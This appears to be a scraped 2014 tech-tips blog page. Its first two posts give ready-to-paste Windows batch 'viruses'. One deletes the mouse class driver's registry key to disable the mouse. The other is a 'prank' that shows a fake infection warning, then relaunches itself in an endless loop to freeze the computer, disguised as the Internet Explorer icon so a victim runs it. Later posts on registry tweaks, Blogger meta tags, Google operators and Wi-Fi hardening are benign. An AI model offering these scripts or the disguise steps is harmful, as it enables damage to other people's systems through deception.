Friday, 21 February 2014

Make a virus that disable Mouse

Step 01 - Open Notepad. 

Step 02 - Copy below codes and paste on Notepad.

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

rem ---------------------------------


Step 03 - Save this file as  virus.bat
Step 04 - All Done you just created your virus.



NOTE: This batch virus is harmfull it will disable your mouse so think before trying it on yourself. 

Batch Virus Prank

1) Go Start and open up a basic text document. I like to use notepad because it is quick to load and easy to use. 


2) In your text document cut and paste this:

@echo off
echo WARNING VIRUS HAS BEEN DETECTED
echo System check
echo -
echo Power - FAILED
echo -
echo RAM - FAILED
echo -
echo Norton - FAILED
echo -
echo Breach of IP adress
echo -
echo Firewall - FAILED
echo -
echo Virus attaining: ****-****-****-8894
echo -
echo Hard drive must be erased and rebooted to resume windows.
echo -
PAUSE
echo -
echo Starting to reboot hardrive.
echo -
echo Do not attempt to quit.
echo -
echo Restart after 10 minutes approximately.
PAUSE
:START
start Internet Explorer.bat
GOTO START

3) Now click "File" then "Save as..." then save it as "Internet Explorer.BAT" onto the Desktop

I will explain to you what each of these symbols mean.

@echo off : This tells the file to hide what its doing and display what we tell it to.

echo : This tells the file to display something. It displays whatever you write after it.

PAUSE : This is what makes that sign come up that says "Press any key to continue" which literally pauses the file.

:START
start a.bat
GOTO START : This tells the computer to run the file over and over and over again without stopping which causes the computer to freeze since it gets opened so much.
Step 2: Creating a Shortcut


4) Now place this file into "My Documents" to keep it hidden.

5) Once it is in "My Documents" right click it and click "Create Shortcut"
Step 3: Saving, Changing, and Executing

 6) Once you have created to shortcut go to it and right click it to open the menu and click on "Properties"

7) This will open up a window. At the top of this window are tabs. Click on the "Shortcut" tab.

8) Now click on at the bottom of the window a button that says "Change Icon"

9) This will open another window. Scroll all the way to your left to find a picture that closely resembles the Internet Explorer icon. Click it and press "OK"

10) Now with the property window still up click on the "Options" tab. In this tab you will find a section that says "Display Options". Now click the circle labeled "Full screen".

11) At the bottom of the "Properties" window click "Apply".

12) Now move your file to the desktop and edit it to delete the "shortcut to" on the name of the file. After that take the current Internet Explorer and move it to "My Documents". If a warning label shows click yes.

P.S. To "deactivate" it just restart the computer. Mind you every time you click it you will have to restart it again so delete it after your first use. P.S.

Footnote: If you can't find the original Internet Explorer you can replace it by going into program files and dragging it to the desktop



Friday, 14 February 2014

Registry Tweaks



Copy To Folder… on every File n Folder


This setting allows you to assign any file on your computer a new right-click menu (context menu) entry.

This entry is named “Copy To Folder…” which is copy current selected file/files to any folder directly from Right click menu..

Settings:-


For any File:

1] Start > Run > regedit> hit Enter
2] Registry > My Computer > HKEY_CLASSES_ROOT > select * (1st subkey)
3] * > shellex > select ‘ContextMenuHandlers‘ & right click > then New > Key
4] then replace ‘New Key #1′ key name to ‘Copy To…‘ or as u wish you can write(but use as nick)
5] on right side pane, select ‘(Default)’ name n Double click on it, then brings Edit string field
6] enter value data as ‘{C2FBB630-2971-11d1-A18c-00c04FD75D13}‘ in it n hit Enter.
(Plz enter value as case sensitive with curly braces)

For any Folder:


1] Start > Run > regedit> hit Enter

2] Registry > My Computer > HKEY_CLASSES_ROOT > Folder


3] Folder > shellex > select ‘ContextMenuHandlers‘ & right click > then New > Key

4] then replace ‘New Key #1′ key name to ‘Copy To…‘ or as u wish you can write(but use as nick)
5] on right side pane, select ‘(Default)’ name n Double click on it, then brings Edit string field
6] enter value data as ‘{C2FBB630-2971-11d1-A18c-00c04FD75D13}‘ in it n hit Enter.

(Plz enter value as case sensitive with curly braces)


Thursday, 13 February 2014

Put Meta Tags in Blogger

How to Put Meta Tags in Blogger 


We give you tutorial of Meta tags inserting in blogger template. You can put Meta tags in Blogger template for better ranking in search engine with follow easy steps.



Step 1.: Login to Blogger > Go to Dashboard > Template > Edit Html

SEO Meta Description
SEO Meta Description



Step 2.: Go to <head> section in Template. You can search this from Ctrl+F
 

Step 3.: After <head> section put following code in your template.
<!-- Meta Tags ~  bloggerseotipstraining.blogspot.com  -->
<meta content='Your Blog Description' name='description'/>
<meta content='Keyword1,Keyword2,Keyword3' name='keywords'/>
<meta content='Author Name' name='Author'/>
<meta content='Author Email Address' name='Email'/>
<meta content='all' name='robots'/>
<meta content='index, follow' name='robots'/>
<meta content='Language Name' name='language'/>
<meta content='Country Name' name='country'/>

<meta content='blogger' name='generator'/>
<!-- /Meta Tags ~   bloggerseotipstraining.blogspot.com  -->
 


Step 4.: Change you original data to demo data as your need.
 

Step 5.: Save your template and Go to your blog, view page source to see your description and keyword.

Google tricks – Google Hacking



Google Tricks – Google Hacking

1.      Google trick to  search different file formats (keyword filetype:doc)

2.      Google trick to search educational resources (keyword site:.edu) example (computer site:.edu)

3.      Finding the time of any location (time romania)

4.      Finding the weather of any location (boston weather)

5.      Tracking commentary of live events (Olympic games Beijing 2008)

6.      Using Google as a calculator (9 * 10)(143+234)(119-8)

7.      Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee)

8.      Find how many teaspoons are in a quarter cup (quarter cup in teaspoons)

9.      How many seconds there are in a year (seconds in a year)

10.    Tracking stocks (stocks:MSFT)

11.    Finding faces (add imgtype=face to the URL)

Google Operators



Google Operators :

1.      define: – This google operator will find definitions for a certain term or  word over the Internet. Very useful when you come across a strange word when writing a post. I use this as a google dictionary. example : (define Computer)

2.      info: – The google info operator will list the sets of information that Google has from a specific website (i.e. info:http://google.com)
3.      site: – This google operator can be used to see the number of indexed pages on your site (i.e.site:www.google.com).    Alternative it can also be used to search for information inside a specific  site or class of sites.
4.      link: – This google link operator allows you to find backlinks pointing to your site. Unfortunately the count is not updated frequently and not all backlinks are shown
5.      allinurl: – Using this Google operator will limit the search to results  that contain the desired keywords on the URL structure. (i.e. allinurl:dailyblogtips)
6.      fileformat: – Useful Google operator for finding specific file formats. Sometimes you know that the information you are looking for is likely to be contained in a PDF document or on a PowerPoint presentation, for instance. (i.e. “fileformat:.pdf market research” will search for PDF documents that contain the terms “market” and “research”)

Wireless Network Hardening



This is the tutorial for securing your AP/Routers.
Threats to Wi-Fi Implementations
Radio waves can penetrate through walls there is a great chance of unauthorized access to the network and data. Because of its broadcasting nature, anybody can sniff the network for valuable credentials. If the network is not properly secured the attacker will get sufficient data to launch an attack.
In brief the following cases may happen.
i) The attacker may search for available wireless networks in the close proximity. If the Access Point( AP) is open the attacker can avail the network without any effort.
ii) The attacker can directly log in to the Access Point using default credentials and configure the device in whatever way he wants.
iii) The attacker can sniff the network for configuration details such as SSID(Service Set Identifier) , BSSID(Basic Service Set Identification ), encryption used, channel used etc. He can capture sufficient packets to launch an attack.
iv) The attacker can install a fake Access Point and lure(like advertising free internet access) users to connect to the rogue AP.
v) The attacker can disrupt the normal functioning of the network.

Securing AP/ Router
As far as a user is concerned, securing Access Point ensures the primary level of security. In this document configuration settings of an AP/Router that is installed in a typical home network is discussed. We have used ‘Linksys’ WAP 54G and ‘beetel’ Router for this purpose. The configuration settings as explained below will secure the AP.
1.       Change Administrator Password
An attacker can easily find out the default password. It must be changed. Ensure that the admin password is strong enough.
Password editing interface of Administrator

2.       Prefer Wi-Fi Protected Access(WPA2 Preferably) instead of Wired Equivalent Privacy(WEP).
WPA’s salient features are strong encryption algorithm, user authentication and support for IEEE 802.1X . Use Wi-Fi Protected Access (WPA) or WPA2 with Pre-Shared Key (PSK) authentication and AES as the encryption standard. The pass phrase should be strong enough.

Interface for configuring Security Mode.

3.       MAC Address Filtering
Access of the clients can be permitted or prevented by providing a list of MAC Addresses in the “MAC Address filter” configuration parameter. This is known as MAC Address filtering. Together with SSID this can also used as a security measure. Select the MAC Address of all the wireless Network interface cards used in the network. The list can be used to permit or prevent the wireless access .
Configuring MAC filter

4.  Best Practices
There are certain best practices explained below which should be followed for enhancing security of wireless Access Point / Routers.
i) Restrict the Access
SSID (Service Set Identifier) is used to identify a wireless network which a user wants to attach. All wireless devices that want to communicate on the WLAN need to have their SSID set to the same string as the AP. Even though the attacker can get the SSID simply by sniffing the network it is preferable to change the default SSID. Avoid SSID which shows name or other information. Name the access point such that it can be easily traceable during trouble shooting. Physical security of access point is also important.
ii) Disable Management via Wireless
It is recommended to disable management of the router via wireless devices associated with the access point. If someone manages to associate with the access point and login to the router , they can change the configuration of the router. Prefer wired interface with AP/Router to configure the device.
iii) Disable Remote Management
Remote Router Access permits web-based management of the wireless router from external networks such as the Internet. By default this feature opens port 8080/TCP on the external side of the router. This feature provides significant risk to the device, permitting an attack vector and more importantly significant risk to internal network. It should be disabled unless remote management is absolutely required. Universal Plug and Play may also be disabled.
iv) Turn off the AP when not in use
This is also advisable since it minimizes the risk of unauthorized access.
v) Configure Network Mode
Select the wireless mode which is depending upon the protocols. The possible options are.
_ Disabled – disables AP.
_ Mixed – permits both 802.11 b and 802.11g.
_ B-Only – 8.2.11 b only.
_ G-Only – 8.2.11 g only.
vi) Disable SSID Broadcast.
This can protect the AP from a naive attacker . By disabling SSID broadcast, the easy availability of SSID can be restricted. But the attacker can still sniff the SSID from frames that devices use when associating with an AP. According to some vendors disabling SSID broadcast may restrict or invite the chance of exploitation.
vii) Set Wireless Channel from default
Changing the default wireless channel used by the AP is a good practice.It may avoid automatic association of the wireless interface to the network.
viii ) Maximize the Beacon Interval
Beacon frames are used for connection establishment and management by IEEE 802.11 networks. These frames from AP to wireless clients ,transmitted at regular intervals are used for configuration matching. It is recommended to set the beacon interval to the maximum number. This will reduce the transmission frequency of SSID so that the attacker will get less number of opportunities to sniff the beacons containing SSID. But there is a problem here. The attacker can probe the network using some specific SSID which is known as active scanning.
ix) Prefer Static IP instead of DHCP.
Since DHCP is automatically assigning IP addresses, an attacker can utilize this feature to get an IP. So it is recommended to use static IP on wireless networks.
 Configuring Static IP

Get Updates Via Facebook.